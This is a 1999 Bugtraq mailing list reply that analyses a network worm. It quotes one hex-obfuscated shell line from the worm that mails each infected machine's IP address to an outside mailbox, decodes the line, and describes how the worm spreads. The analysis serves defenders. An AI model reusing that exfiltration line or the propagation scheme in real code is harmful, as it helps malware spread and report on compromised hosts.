Bugtraq mailing list archives

Re: MW

From: adam () XPERT COM (Adam Morrison)
Date: Tue, 7 Sep 1999 17:23:25 +0200

On Wed, 1 Sep 1999, Christian Koderer wrote:

./IP | mail `printf
"\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
logout
_EOF_



In case no one bothered figuring this one out, this translates to
'beurp () hotmail com'

Apparently './IP' is a program it runs to figure out which IP it should
get the worm files from. Did you find a similarly named file?


It's a worm; it gets the worm files from the last infected machine.
`IP' returns the address of the machine that the copy of the worm
is running on, and is used in the `cmd' grappling hook which
apparently gets executed on compromised remote hosts.  Each time the
worm infects a machine, it mails the IP address of that machine to
<beurp () hotmail com>.

Now, not to make any unfounded allegations, but this worm looks
remarkably like ADMw0rm.  I wonder why it restarts named when first
infecting a host, when it appears to also utilize several other
vulnerabilites in order to get in.  Ho, hum.

Current thread:

MW Christian Koderer (Sep 01)
- Re: MW Nir Soffer (Sep 03)
- Re: MW Nassar Carnegie (Sep 04)
- Re: MW Peter van Dijk (Sep 04)
- <Possible follow-ups>
- Re: MW Marc Heuse (Sep 03)
- Re: MW Stuart Harris (Sep 07)
- Re: MW Adam Morrison (Sep 07)
  - Re: MW Max Vision (Sep 20)